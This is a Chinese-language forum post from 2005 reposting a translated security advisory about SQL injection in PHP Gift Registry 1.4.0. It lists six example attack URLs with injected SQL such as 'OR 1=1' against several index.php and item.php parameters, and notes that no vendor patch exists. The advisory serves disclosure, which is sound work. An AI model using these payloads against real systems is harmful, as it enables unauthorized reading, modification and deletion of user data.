[翻译]PHP Gift Registry参数输入合法性漏洞导致SQL注入

hak_ban[HSG]

晶莹剔透§烈日灼然

Rank: 1

E.S.T论坛贵宾

帖子: 137
精华: 4
积分: 3301
阅读权限: 60
性别: 男
在线时间: 0 小时
注册时间: 2004-10-21
最后登录: 2005-7-29

发短消息
加为好友
当前离线

楼主大中小发表于 2005-1-18 22:17 只看该作者

[翻译]PHP Gift Registry参数输入合法性漏洞导致SQL注入

翻译:Z.C.Y[B.C.T]
翻译网站:http://www.bnso.net/
安全公告：1012910
资料来源：http://securitytracker.com/id?1012910
CVE 参考：GENERIC-MAP-NOMATCH
发布日期：2005-1-16
发布作者：Madelman <madelman@iname.com>
漏洞危害：泄露系统信息，泄露用户信息，修改用户信息
漏洞利用程序包含：是
影响版本：1.4.0
厂商地址：phpgiftreg.sourceforge.net
漏洞起因：输入合法性错误
影响系统：Linux (Any), UNIX (Any), Windows (Any)

漏洞描述：Madelman发现在PHP Gift Registry (phpGiftReq)中存在输入合法性漏洞，导致远程用户可以实行SQL注入。
这是脚本对用户的合法性输入过滤不严导致，远程用户可以精心构造一个URL执行SQL注入。

提供如下测试方法：
http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

http://[target ]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/i ndex.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

http://[target]/phpgiftreg/item.php ?action=delete&itemid=3%20OR%201%3d1

其他的参数和函数可能也受到影响。

解决方法：目前厂商还没有提供补丁或者升级程序

白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

‹‹ 上一主题 | 下一主题 ››